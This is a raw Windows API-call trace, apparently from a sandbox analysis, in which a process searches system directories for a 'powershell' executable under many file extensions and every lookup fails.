	[0428.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.712] SetErrorMode (uMode=0x1) returned 0x1
	[0428.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.713] SetErrorMode (uMode=0x1) returned 0x1
	[0428.713] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.713] SetErrorMode (uMode=0x1) returned 0x1
	[0428.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.713] SetErrorMode (uMode=0x1) returned 0x1
	[0428.713] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.714] SetErrorMode (uMode=0x1) returned 0x1
	[0428.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.714] SetErrorMode (uMode=0x1) returned 0x1
	[0428.714] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.714] SetErrorMode (uMode=0x1) returned 0x1
	[0428.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.715] SetErrorMode (uMode=0x1) returned 0x1
	[0428.715] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.715] SetErrorMode (uMode=0x1) returned 0x1
	[0428.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.715] SetErrorMode (uMode=0x1) returned 0x1
	[0428.715] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.715] SetErrorMode (uMode=0x1) returned 0x1
	[0428.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.716] SetErrorMode (uMode=0x1) returned 0x1
	[0428.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.716] SetErrorMode (uMode=0x1) returned 0x1
	[0428.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.716] SetErrorMode (uMode=0x1) returned 0x1
	[0428.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.717] SetErrorMode (uMode=0x1) returned 0x1
	[0428.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.717] SetErrorMode (uMode=0x1) returned 0x1
	[0428.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.717] SetErrorMode (uMode=0x1) returned 0x1
	[0428.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0428.717] SetErrorMode (uMode=0x1) returned 0x1
	[0428.718] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.718] SetErrorMode (uMode=0x1) returned 0x1
	[0428.718] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.718] SetErrorMode (uMode=0x1) returned 0x1
	[0428.718] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.718] SetErrorMode (uMode=0x1) returned 0x1
	[0428.719] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.719] SetErrorMode (uMode=0x1) returned 0x1
	[0428.719] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.719] SetErrorMode (uMode=0x1) returned 0x1
	[0428.719] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.719] SetErrorMode (uMode=0x1) returned 0x1
	[0428.719] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.720] SetErrorMode (uMode=0x1) returned 0x1
	[0428.720] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.720] SetErrorMode (uMode=0x1) returned 0x1
	[0428.720] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.720] SetErrorMode (uMode=0x1) returned 0x1
	[0428.720] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.721] SetErrorMode (uMode=0x1) returned 0x1
	[0428.721] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.721] SetErrorMode (uMode=0x1) returned 0x1
	[0428.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.721] SetErrorMode (uMode=0x1) returned 0x1
	[0428.721] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.721] SetErrorMode (uMode=0x1) returned 0x1
	[0428.722] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.722] SetErrorMode (uMode=0x1) returned 0x1
	[0428.722] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.722] SetErrorMode (uMode=0x1) returned 0x1
	[0428.722] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.722] SetErrorMode (uMode=0x1) returned 0x1
	[0428.722] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.723] SetErrorMode (uMode=0x1) returned 0x1
	[0428.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.723] SetErrorMode (uMode=0x1) returned 0x1
	[0428.723] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.723] SetErrorMode (uMode=0x1) returned 0x1
	[0428.723] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.723] SetErrorMode (uMode=0x1) returned 0x1
	[0428.724] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.724] SetErrorMode (uMode=0x1) returned 0x1
	[0428.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.724] SetErrorMode (uMode=0x1) returned 0x1
	[0428.724] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.724] SetErrorMode (uMode=0x1) returned 0x1
	[0428.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.725] SetErrorMode (uMode=0x1) returned 0x1
	[0428.725] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.725] SetErrorMode (uMode=0x1) returned 0x1
	[0428.725] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.725] SetErrorMode (uMode=0x1) returned 0x1
	[0428.725] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.726] SetErrorMode (uMode=0x1) returned 0x1
	[0428.726] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.726] SetErrorMode (uMode=0x1) returned 0x1
	[0428.726] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.726] SetErrorMode (uMode=0x1) returned 0x1
	[0428.726] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0428.727] SetErrorMode (uMode=0x1) returned 0x1
	[0428.727] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.727] SetErrorMode (uMode=0x1) returned 0x1
	[0428.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.727] SetErrorMode (uMode=0x1) returned 0x1
	[0428.727] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.727] SetErrorMode (uMode=0x1) returned 0x1
	[0428.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.728] SetErrorMode (uMode=0x1) returned 0x1
	[0428.728] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.728] SetErrorMode (uMode=0x1) returned 0x1
	[0428.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.728] SetErrorMode (uMode=0x1) returned 0x1
	[0428.728] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.729] SetErrorMode (uMode=0x1) returned 0x1
	[0428.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.729] SetErrorMode (uMode=0x1) returned 0x1
	[0428.729] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.729] SetErrorMode (uMode=0x1) returned 0x1
	[0428.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.730] SetErrorMode (uMode=0x1) returned 0x1
	[0428.730] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.730] SetErrorMode (uMode=0x1) returned 0x1
	[0428.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.730] SetErrorMode (uMode=0x1) returned 0x1
	[0428.730] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c83de40 | out: lpFindFileData=0x1c83de40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0428.730] SetErrorMode (uMode=0x1) returned 0x1
	[0428.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0428.731] SetErrorMode (uMode=0x1) returned 0x1
